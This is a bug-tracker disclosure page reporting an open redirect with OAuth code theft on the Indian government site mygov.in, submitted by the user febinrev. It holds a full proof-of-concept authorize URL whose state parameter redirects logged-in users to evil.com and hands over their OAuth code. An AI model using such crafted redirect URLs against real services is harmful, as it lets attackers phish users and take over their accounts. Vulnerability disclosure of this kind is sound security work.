BLT Issue - Open Redirection with oauth code stealing in indian government\u0027s mygov.in webapp. The URL : https://auth.mygov.in/oauth2/authorize?response_type\u003Dcode\u0026client_id\u003DMyGovStartUpIndia\u0026redirect_uri\u003Dhttp://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve\u0026scope\u003Duser_profile\u0026state\u003Dhttps://evil.com/ will redirect the user of mygov.in to evil.com after that user logs in with correct credentials. This makes the attack more effective because hacker can redirect the real users who has account in mygov.in . And the attacker site will also get access to his profile with the OAuth code.

Open Redirection with oauth code stealing in indian government\u0027s mygov.in webapp. The URL : https://auth.mygov.in/oauth2/authorize?response_type\u003Dcode\u0026client_id\u003DMyGovStartUpIndia\u0026redirect_uri\u003Dhttp://api.startupindia.gov.in/sih/api/noauth/oauth2/code/recieve\u0026scope\u003Duser_profile\u0026state\u003Dhttps://evil.com/ will redirect the user of mygov.in to evil.com after that user logs in with correct credentials. This makes the attack more effective because hacker can redirect the real users who has account in mygov.in . And the attacker site will also get access to his profile with the OAuth code.

Tweet GitHub Link

febinrev

Total Points = 320

febinrev

Total Points = 320

Bug Type: Security

Status: open

Added on: Aug. 30, 2020, 6:38 a.m.

Submitted: Independently

Reported on mygov.in

Issues Reported: 1

Browser Version: 68.0

Operating System: Linux

OS Version: Unknown

To comment, please sign in.